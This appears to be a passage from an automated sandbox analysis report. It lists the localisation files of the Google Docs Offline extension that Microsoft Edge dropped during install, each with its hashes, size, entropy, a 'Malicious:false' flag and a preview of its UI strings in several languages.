                                                                                                                                                                                                                                                                                    Preview:{"createnew":{"message":"\u0428\u0418\u041d\u0418\u0419\u0413 \u04ae\u04ae\u0421\u0413\u042d\u0425"},"explanationofflinedisabled":{"message":"\u0422\u0430 \u043e\u0444\u043b\u0430\u0439\u043d \u0431\u0430\u0439\u043d\u0430. Google \u0414\u043e\u043a\u044b\u0433 \u0438\u043d\u0442\u0435\u0440\u043d\u044d\u0442\u0433\u04af\u0439\u0433\u044d\u044d\u0440 \u0430\u0448\u0438\u0433\u043b\u0430\u0445\u044b\u043d \u0442\u0443\u043b\u0434 \u0434\u0430\u0440\u0430\u0430\u0433\u0438\u0439\u043d \u0443\u0434\u0430\u0430 \u0438\u043d\u0442\u0435\u0440\u043d\u044d\u0442\u044d\u0434 \u0445\u043e\u043b\u0431\u043e\u0433\u0434\u043e\u0445\u0434\u043e\u043e Google \u0414\u043e\u043a\u044b\u043d \u043d\u04af\u04af\u0440 \u0445\u0443\u0443\u0434\u0430\u0441\u043d\u0430\u0430\u0441 \u0442\u043e\u0445\u0438\u0440\u0433\u043e\u043e \u0434\u043e\u0442\u043e\u0440\u0445 \u043e\u0444\u043b\u0430\u0439\u043d \u0441\u0438\u043d\u043a\u0438\u0439\u0433 \u0438\u0434\u044d\u0432\u0445\u0436\u04af\u04af\u043b\u043d\u0

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\scoped_dir1096_770348966\CRX_INSTALL\_locales\mr\messages.json

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):1719
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.287702203591075
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:48:65/5EKaDMw6pEf4I5+jSksOTJqQyrFO8C:65/5EKaAw6pEf4I5+vsOVqQyFO8C
                                                                                                                                                                                                                                                                                    MD5:3B98C4ED8874A160C3789FEAD5553CFA
                                                                                                                                                                                                                                                                                    SHA1:5550D0EC548335293D962AAA96B6443DD8ABB9F6
                                                                                                                                                                                                                                                                                    SHA-256:ADEB082A9C754DFD5A9D47340A3DDCC19BF9C7EFA6E629A2F1796305F1C9A66F
                                                                                                                                                                                                                                                                                    SHA-512:5139B6C6DF9459C7B5CDC08A98348891499408CD75B46519BA3AC29E99AAAFCC5911A1DEE6C3A57E3413DBD0FAE72D7CBC676027248DCE6364377982B5CE4151
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": ".... .... ...".. },.. "explanationofflinedisabled": {.. "message": "...... ...... ..... ......... ....... ....... ..... Google ....... ............, Google ....... .............. .......... .. ... ..... .... ...... ......... ...... ...... ...... .... .... ....".. },.. "explanationofflineenabled": {.. "message": "...... ...... ...., ..... ...... ...... ...... .... ....... ... ..... .... .... ... .....".. },.. "extdesc": {.. "message": "..... ..

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\scoped_dir1096_770348966\CRX_INSTALL\_locales\ms\messages.json

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):936
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.457879437756106
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:24:1HARXIqhmemNKsE27rhdfNLChtyo2JJ/YgTgin:iIqFC7lrDfNLCIBRzn
                                                                                                                                                                                                                                                                                    MD5:7D273824B1E22426C033FF5D8D7162B7
                                                                                                                                                                                                                                                                                    SHA1:EADBE9DBE5519BD60458B3551BDFC36A10049DD1
                                                                                                                                                                                                                                                                                    SHA-256:2824CF97513DC3ECC261F378BFD595AE95A5997E9D1C63F5731A58B1F8CD54F9
                                                                                                                                                                                                                                                                                    SHA-512:E5B611BBFAB24C9924D1D5E1774925433C65C322769E1F3B116254B1E9C69B6DF1BE7828141EEBBF7524DD179875D40C1D8F29C4FB86D663B8A365C6C60421A7
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": "BUAT BAHARU".. },.. "explanationofflinedisabled": {.. "message": "Anda berada di luar talian. Untuk menggunakan Google Docs tanpa sambungan Internet, pergi ke tetapan di halaman utama Google Docs dan hidupkan penyegerakan luar talian apabila anda disambungkan ke Internet selepas ini.".. },.. "explanationofflineenabled": {.. "message": "Anda berada di luar talian, tetapi anda masih boleh mengedit fail yang tersedia atau buat fail baharu.".. },.. "extdesc": {.. "message": "Edit, buat dan lihat dokumen, hamparan dan pembentangan anda . kesemuanya tanpa akses Internet.".. },.. "extname": {.. "message": "Google Docs Luar Talian".. },.. "learnmore": {.. "message": "Ketahui Lebih Lanjut".. },.. "popuphelptext": {.. "message": "Tulis, edit dan bekerjasama di mana-mana sahaja anda berada, dengan atau tanpa sambungan Internet.".. }..}..

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\scoped_dir1096_770348966\CRX_INSTALL\_locales\my\messages.json

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):3830
                                                                                                                                                                                                                                                                                    Entropy (8bit):3.5483353063347587
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:48:Ya+Ivxy6ur1+j3P7Xgr5ELkpeCgygyOxONHO3pj6H57ODyOXOVp6:8Uspsj3P3ty2a66xl09
                                                                                                                                                                                                                                                                                    MD5:342335A22F1886B8BC92008597326B24
                                                                                                                                                                                                                                                                                    SHA1:2CB04F892E430DCD7705C02BF0A8619354515513
                                                                                                                                                                                                                                                                                    SHA-256:243BEFBD6B67A21433DCC97DC1A728896D3A070DC20055EB04D644E1BB955FE7
                                                                                                                                                                                                                                                                                    SHA-512:CD344D060E30242E5A4705547E807CE3CE2231EE983BB9A8AD22B3E7598A7EC87399094B04A80245AD51D039370F09D74FE54C0B0738583884A73F0C7E888AD8
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{"createnew":{"message":"\u1021\u101e\u1005\u103a \u1015\u103c\u102f\u101c\u102f\u1015\u103a\u101b\u1014\u103a"},"explanationofflinedisabled":{"message":"\u101e\u1004\u103a \u1021\u1031\u102c\u1037\u1016\u103a\u101c\u102d\u102f\u1004\u103a\u1038\u1016\u103c\u1005\u103a\u1014\u1031\u1015\u102b\u101e\u100a\u103a\u104b \u1021\u1004\u103a\u1010\u102c\u1014\u1000\u103a\u1001\u103b\u102d\u1010\u103a\u1006\u1000\u103a\u1019\u103e\u102f \u1019\u101b\u103e\u102d\u1018\u1032 Google Docs \u1000\u102d\u102f \u1021\u101e\u102f\u1036\u1038\u1015\u103c\u102f\u101b\u1014\u103a \u1014\u1031\u102c\u1000\u103a\u1010\u1005\u103a\u1000\u103c\u102d\u1019\u103a \u101e\u1004\u103a\u1021\u1004\u103a\u1010\u102c\u1014\u1000\u103a\u1001\u103b\u102d\u1010\u103a\u1006\u1000\u103a\u101e\u100a\u1037\u103a\u1021\u1001\u102b Google Docs \u1015\u1004\u103a\u1019\u1005\u102c\u1019\u103b\u1000\u103a\u1014\u103e\u102c\u101b\u103e\u102d \u1006\u1000\u103a\u1010\u1004\u103a\u1019\u103b\u102c\u1038\u101e\u102d\u102f\u1037\u1

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\scoped_dir1096_770348966\CRX_INSTALL\_locales\ne\messages.json

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):1898
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.187050294267571
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:24:1HAmQ6ZSWfAx6fLMr48tE/cAbJtUZJScSIQoAfboFMiQ9pdvz48YgqG:TQ6W6MbkcAltUJxQdfbqQ9pp0gqG
                                                                                                                                                                                                                                                                                    MD5:B1083DA5EC718D1F2F093BD3D1FB4F37
                                                                                                                                                                                                                                                                                    SHA1:74B6F050D918448396642765DEF1AD5390AB5282
                                                                                                                                                                                                                                                                                    SHA-256:E6ED0A023EF31705CCCBAF1E07F2B4B2279059296B5CA973D2070417BA16F790
                                                                                                                                                                                                                                                                                    SHA-512:7102B90ABBE2C811E8EE2F1886A73B1298D4F3D5D05F0FFDB57CF78B9A49A25023A290B255BAA4895BB150B388BAFD9F8432650B8C70A1A9A75083FFFCD74F1A
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": ".... ....... .........".. },.. "explanationofflinedisabled": {.. "message": "..... ...... .......... .... ........ .... .... Google ........ ...... .... ..... ..... ... .......... ....... .... Google ........ .......... ..... .......... .. ...... ..... .... ..... ......... .. ..........".. },.. "explanationofflineenabled": {.. "message": "..... ...... ........., .. ..... ... ... ...... ....... ....... .. .... ....... ....

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\scoped_dir1096_770348966\CRX_INSTALL\_locales\nl\messages.json

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):914
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.513485418448461
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:12:1HASvgFARCBxNBv52/fXjOXl6W6ICBxeBvMzU1CSUJAO6SFAIVIbCBhZHdb1tvz+:1HABJx4X6QDwEzlm2uGvYzKU
                                                                                                                                                                                                                                                                                    MD5:32DF72F14BE59A9BC9777113A8B21DE6
                                                                                                                                                                                                                                                                                    SHA1:2A8D9B9A998453144307DD0B700A76E783062AD0
                                                                                                                                                                                                                                                                                    SHA-256:F3FE1FFCB182183B76E1B46C4463168C746A38E461FD25CA91FF2A40846F1D61
                                                                                                                                                                                                                                                                                    SHA-512:E0966F5CCA5A8A6D91C58D716E662E892D1C3441DAA5D632E5E843839BB989F620D8AC33ED3EDBAFE18D7306B40CD0C4639E5A4E04DA2C598331DACEC2112AAD
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": "NIEUW MAKEN".. },.. "explanationofflinedisabled": {.. "message": "Je bent offline. Wil je Google Documenten zonder internetverbinding gebruiken, ga dan de volgende keer dat je verbinding met internet hebt naar 'Instellingen' op de homepage van Google Documenten en zet 'Offline synchronisatie' aan.".. },.. "explanationofflineenabled": {.. "message": "Je bent offline, maar je kunt nog wel beschikbare bestanden bewerken of nieuwe bestanden maken.".. },.. "extdesc": {.. "message": "Bewerk, maak en bekijk je documenten, spreadsheets en presentaties. Allemaal zonder internettoegang.".. },.. "extname": {.. "message": "Offline Documenten".. },.. "learnmore": {.. "message": "Meer informatie".. },.. "popuphelptext": {.. "message": "Overal schrijven, bewerken en samenwerken, met of zonder internetverbinding.".. }..}..

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\scoped_dir1096_770348966\CRX_INSTALL\_locales\nn\messages.json

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):851
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.4858053753176526
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:12:1HASvgg4eCBxNdN3Pj1NzXW6iFryCBxesJGceKCSUuvNn3AwCBhUufz1tHaXRdAv:1HA3dj/BNzXviFrpj4sNQXJezAa6
                                                                                                                                                                                                                                                                                    MD5:07FFBE5F24CA348723FF8C6C488ABFB8
                                                                                                                                                                                                                                                                                    SHA1:6DC2851E39B2EE38F88CF5C35A90171DBEA5B690
                                                                                                                                                                                                                                                                                    SHA-256:6895648577286002F1DC9C3366F558484EB7020D52BBF64A296406E61D09599C
                                                                                                                                                                                                                                                                                    SHA-512:7ED2C8DB851A84F614D5DAF1D5FE633BD70301FD7FF8A6723430F05F642CEB3B1AD0A40DE65B224661C782FFCEC69D996EBE3E5BB6B2F478181E9A07D8CD41F6
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": "CREATE NEW".. },.. "explanationofflinedisabled": {.. "message": "You're offline. To use Google Docs without an internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the internet.".. },.. "explanationofflineenabled": {.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extdesc": {.. "message": "Edit, create, and view your documents, spreadsheets, and presentations . all without internet access.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Learn More".. },.. "popuphelptext": {.. "message": "Write, edit, and collaborate wherever you are, with or without an internet connection.".. }..}..

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\scoped_dir1096_770348966\CRX_INSTALL\_locales\no\messages.json

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):878
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.4541485835627475
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:24:1HAqwwrJ6wky68uk+NILxRGJwBvDyrj9V:nwwQwky6W+NwswVyT
                                                                                                                                                                                                                                                                                    MD5:A1744B0F53CCF889955B95108367F9C8
                                                                                                                                                                                                                                                                                    SHA1:6A5A6771DFF13DCB4FD425ED839BA100B7123DE0
                                                                                                                                                                                                                                                                                    SHA-256:21CEFF02B45A4BFD60D144879DFA9F427949A027DD49A3EB0E9E345BD0B7C9A8
                                                                                                                                                                                                                                                                                    SHA-512:F55E43F14514EECB89F6727A0D3C234149609020A516B193542B5964D2536D192F40CC12D377E70C683C269A1BDCDE1C6A0E634AA84A164775CFFE776536A961
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": "OPPRETT NYTT".. },.. "explanationofflinedisabled": {.. "message": "Du er uten nett. For . bruke Google Dokumenter uten internettilkobling, g. til innstillingene p. Google Dokumenter-nettsiden og sl. p. synkronisering uten nett neste gang du er koblet til Internett.".. },.. "explanationofflineenabled": {.. "message": "Du er uten nett, men du kan likevel endre tilgjengelige filer eller opprette nye.".. },.. "extdesc": {.. "message": "Rediger, opprett og se dokumentene, regnearkene og presentasjonene dine . uten nettilgang.".. },.. "extname": {.. "message": "Google Dokumenter uten nett".. },.. "learnmore": {.. "message": "Finn ut mer".. },.. "popuphelptext": {.. "message": "Skriv, rediger eller samarbeid uansett hvor du er, med eller uten internettilkobling.".. }..}..

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\scoped_dir1096_770348966\CRX_INSTALL\_locales\pa\messages.json

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):2766
                                                                                                                                                                                                                                                                                    Entropy (8bit):3.839730779948262
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:48:YEH6/o0iZbNCbDMUcipdkNtQjsGKIhO9aBjj/nxt9o5nDAj3:p6wbZbEbvJ8jQkIhO9aBjb/90Ab
                                                                                                                                                                                                                                                                                    MD5:97F769F51B83D35C260D1F8CFD7990AF
                                                                                                                                                                                                                                                                                    SHA1:0D59A76564B0AEE31D0A074305905472F740CECA
                                                                                                                                                                                                                                                                                    SHA-256:BBD37D41B7DE6F93948FA2437A7699D4C30A3C39E736179702F212CB36A3133C
                                                                                                                                                                                                                                                                                    SHA-512:D91F5E2D22FC2D7F73C1F1C4AF79DB98FCFD1C7804069AE9B2348CBC729A6D2DFF7FB6F44D152B0BDABA6E0D05DFF54987E8472C081C4D39315CEC2CBC593816
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{"createnew":{"message":"\u0a28\u0a35\u0a3e\u0a02 \u0a2c\u0a23\u0a3e\u0a13"},"explanationofflinedisabled":{"message":"\u0a24\u0a41\u0a38\u0a40\u0a02 \u0a06\u0a2b\u0a3c\u0a32\u0a3e\u0a08\u0a28 \u0a39\u0a4b\u0964 \u0a07\u0a70\u0a1f\u0a30\u0a28\u0a48\u0a71\u0a1f \u0a15\u0a28\u0a48\u0a15\u0a36\u0a28 \u0a26\u0a47 \u0a2c\u0a3f\u0a28\u0a3e\u0a02 Google Docs \u0a28\u0a42\u0a70 \u0a35\u0a30\u0a24\u0a23 \u0a32\u0a08, \u0a05\u0a17\u0a32\u0a40 \u0a35\u0a3e\u0a30 \u0a1c\u0a26\u0a4b\u0a02 \u0a24\u0a41\u0a38\u0a40\u0a02 \u0a07\u0a70\u0a1f\u0a30\u0a28\u0a48\u0a71\u0a1f \u0a26\u0a47 \u0a28\u0a3e\u0a32 \u0a15\u0a28\u0a48\u0a15\u0a1f \u0a39\u0a4b\u0a35\u0a4b \u0a24\u0a3e\u0a02 Google Docs \u0a2e\u0a41\u0a71\u0a16 \u0a2a\u0a70\u0a28\u0a47 '\u0a24\u0a47 \u0a38\u0a48\u0a1f\u0a3f\u0a70\u0a17\u0a3e\u0a02 \u0a35\u0a3f\u0a71\u0a1a \u0a1c\u0a3e\u0a13 \u0a05\u0a24\u0a47 \u0a06\u0a2b\u0a3c\u0a32\u0a3e\u0a08\u0a28 \u0a38\u0a3f\u0a70\u0a15 \u0a28\u0a42\u0a70 \u0a1a\u0a3e\u0a32\u0a42 \u0a15\u0a30\u0a4b\u0964"},"expla

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\scoped_dir1096_770348966\CRX_INSTALL\_locales\pl\messages.json

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):978
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.879137540019932
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:24:1HApiJiRelvm3wi8QAYcbm24sK+tFJaSDD:FJMx3whxYcbNp
                                                                                                                                                                                                                                                                                    MD5:B8D55E4E3B9619784AECA61BA15C9C0F
                                                                                                                                                                                                                                                                                    SHA1:B4A9C9885FBEB78635957296FDDD12579FEFA033
                                                                                                                                                                                                                                                                                    SHA-256:E00FF20437599A5C184CA0C79546CB6500171A95E5F24B9B5535E89A89D3EC3D
                                                                                                                                                                                                                                                                                    SHA-512:266589116EEE223056391C65808255EDAE10EB6DC5C26655D96F8178A41E283B06360AB8E08AC3857D172023C4F616EF073D0BEA770A3B3DD3EE74F5FFB2296B
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": "UTW.RZ NOWY".. },.. "explanationofflinedisabled": {.. "message": "Jeste. offline. Aby korzysta. z Dokument.w Google bez po..czenia internetowego, otw.rz ustawienia na stronie g..wnej Dokument.w Google i w..cz synchronizacj. offline nast.pnym razem, gdy b.dziesz mie. dost.p do internetu.".. },.. "explanationofflineenabled": {.. "message": "Jeste. offline, ale nadal mo.esz edytowa. dost.pne pliki i tworzy. nowe.".. },.. "extdesc": {.. "message": "Edytuj, tw.rz i wy.wietlaj swoje dokumenty, arkusze kalkulacyjne oraz prezentacje bez konieczno.ci ..czenia si. z internetem.".. },.. "extname": {.. "message": "Dokumenty Google offline".. },.. "learnmore": {.. "message": "Wi.cej informacji".. },.. "popuphelptext": {.. "message": "Pisz, edytuj i wsp..pracuj, gdziekolwiek jeste. . niezale.nie od tego, czy masz po..czenie z internetem.".. }..}..

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\scoped_dir1096_770348966\CRX_INSTALL\_locales\pt_BR\messages.json

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):907
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.599411354657937
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:12:1HASvgU30CBxNd6GwXOK1styCJ02OK9+4KbCBxed6X4LBAt4rXgUCSUuYDHIIQka:1HAcXlyCJ5+Tsz4LY4rXSw/Q+ftkC
                                                                                                                                                                                                                                                                                    MD5:608551F7026E6BA8C0CF85D9AC11F8E3
                                                                                                                                                                                                                                                                                    SHA1:87B017B2D4DA17E322AF6384F82B57B807628617
                                                                                                                                                                                                                                                                                    SHA-256:A73EEA087164620FA2260D3910D3FBE302ED85F454EDB1493A4F287D42FC882F
                                                                                                                                                                                                                                                                                    SHA-512:82F52F8591DB3C0469CC16D7CBFDBF9116F6D5B5D2AD02A3D8FA39CE1378C64C0EA80AB8509519027F71A89EB8BBF38A8702D9AD26C8E6E0F499BF7DA18BF747
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": "CRIAR NOVO".. },.. "explanationofflinedisabled": {.. "message": "Voc. est. off-line. Para usar o Documentos Google sem conex.o com a Internet, na pr.xima vez que se conectar, acesse as configura..es na p.gina inicial do Documentos Google e ative a sincroniza..o off-line.".. },.. "explanationofflineenabled": {.. "message": "Voc. est. off-line, mas mesmo assim pode editar os arquivos dispon.veis ou criar novos arquivos.".. },.. "extdesc": {.. "message": "Edite, crie e veja seus documentos, planilhas e apresenta..es sem precisar de acesso . Internet.".. },.. "extname": {.. "message": "Documentos Google off-line".. },.. "learnmore": {.. "message": "Saiba mais".. },.. "popuphelptext": {.. "message": "Escreva, edite e colabore onde voc. estiver, com ou sem conex.o com a Internet.".. }..}..

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\scoped_dir1096_770348966\CRX_INSTALL\_locales\pt_PT\messages.json

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):914
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.604761241355716
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:24:1HAcXzw8M+N0STDIjxX+qxCjKw5BKriEQFMJXkETs:zXzw0pKXbxqKw5BKri3aNY
                                                                                                                                                                                                                                                                                    MD5:0963F2F3641A62A78B02825F6FA3941C
                                                                                                                                                                                                                                                                                    SHA1:7E6972BEAB3D18E49857079A24FB9336BC4D2D48
                                                                                                                                                                                                                                                                                    SHA-256:E93B8E7FB86D2F7DFAE57416BB1FB6EE0EEA25629B972A5922940F0023C85F90
                                                                                                                                                                                                                                                                                    SHA-512:22DD42D967124DA5A2209DD05FB6AD3F5D0D2687EA956A22BA1E31C56EC09DEB53F0711CD5B24D672405358502E9D1C502659BB36CED66CAF83923B021CA0286
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": "CRIAR NOVO".. },.. "explanationofflinedisabled": {.. "message": "Est. offline. Para utilizar o Google Docs sem uma liga..o . Internet, aceda .s defini..es na p.gina inicial do Google Docs e ative a sincroniza..o offline da pr.xima vez que estiver ligado . Internet.".. },.. "explanationofflineenabled": {.. "message": "Est. offline, mas continua a poder editar os ficheiros dispon.veis ou criar novos ficheiros.".. },.. "extdesc": {.. "message": "Edite, crie e veja os documentos, as folhas de c.lculo e as apresenta..es, tudo sem precisar de aceder . Internet.".. },.. "extname": {.. "message": "Google Docs offline".. },.. "learnmore": {.. "message": "Saber mais".. },.. "popuphelptext": {.. "message": "Escreva edite e colabore onde quer que esteja, com ou sem uma liga..o . Internet.".. }..}..

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\scoped_dir1096_770348966\CRX_INSTALL\_locales\ro\messages.json

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):937
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.686555713975264
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:24:1HA8dC6e6w+uFPHf2TFMMlecFpweWV4RE:pC6KvHf4plVweCx
                                                                                                                                                                                                                                                                                    MD5:BED8332AB788098D276B448EC2B33351
                                                                                                                                                                                                                                                                                    SHA1:6084124A2B32F386967DA980CBE79DD86742859E
                                                                                                                                                                                                                                                                                    SHA-256:085787999D78FADFF9600C9DC5E3FF4FB4EB9BE06D6BB19DF2EEF8C284BE7B20
                                                                                                                                                                                                                                                                                    SHA-512:22596584D10707CC1C8179ED3ABE46EF2C314CF9C3D0685921475944B8855AAB660590F8FA1CFDCE7976B4BB3BD9ABBBF053F61F1249A325FD0094E1C95692ED
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": "CREEAZ. UN DOCUMENT".. },.. "explanationofflinedisabled": {.. "message": "E.ti offline. Pentru a utiliza Documente Google f.r. conexiune la internet, intr. .n set.rile din pagina principal. Documente Google .i activeaz. sincronizarea offline data viitoare c.nd e.ti conectat(.) la internet.".. },.. "explanationofflineenabled": {.. "message": "E.ti offline, dar po.i .nc. s. editezi fi.ierele disponibile sau s. creezi altele.".. },.. "extdesc": {.. "message": "Editeaz., creeaz. .i acceseaz. documente, foi de calcul .i prezent.ri - totul f.r. acces la internet.".. },.. "extname": {.. "message": "Documente Google Offline".. },.. "learnmore": {.. "message": "Afl. mai multe".. },.. "popuphelptext": {.. "message": "Scrie, editeaz. .i colaboreaz. oriunde ai fi, cu sau f.r. conexiune la internet.".. }..}..

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\scoped_dir1096_770348966\CRX_INSTALL\_locales\ru\messages.json

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):1337
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.69531415794894
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:24:1HABEapHTEmxUomjsfDVs8THjqBK8/hHUg41v+Lph5eFTHQ:I/VdxUomjsre8Kh4Riph5eFU
                                                                                                                                                                                                                                                                                    MD5:51D34FE303D0C90EE409A2397FCA437D
                                                                                                                                                                                                                                                                                    SHA1:B4B9A7B19C62D0AA95D1F10640A5FBA628CCCA12
                                                                                                                                                                                                                                                                                    SHA-256:BE733625ACD03158103D62BC0EEF272CA3F265AC30C87A6A03467481A177DAE3
                                                                                                                                                                                                                                                                                    SHA-512:E8670DED44DC6EE30E5F41C8B2040CF8A463CD9A60FC31FA70EB1D4C9AC1A3558369792B5B86FA761A21F5266D5A35E5C2C39297F367DAA84159585C19EC492A
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": ".......".. },.. "explanationofflinedisabled": {.. "message": "..... ............ Google ......... ... ........., ............ . .... . ......... ............. . ......-...... . .......... .. ......... .........".. },.. "explanationofflineenabled": {.. "message": "... ........... . .......... .. ...... ......... ..... ..... . ............. .., . ....... ........ ......-.......".. },.. "extdesc": {.. "message": ".........., .............. . ............ ........., ....... . ........... ... ....... . ..........".. },.. "extname": {.. "message": "Google.......... ......".. },.. "learnmore": {.

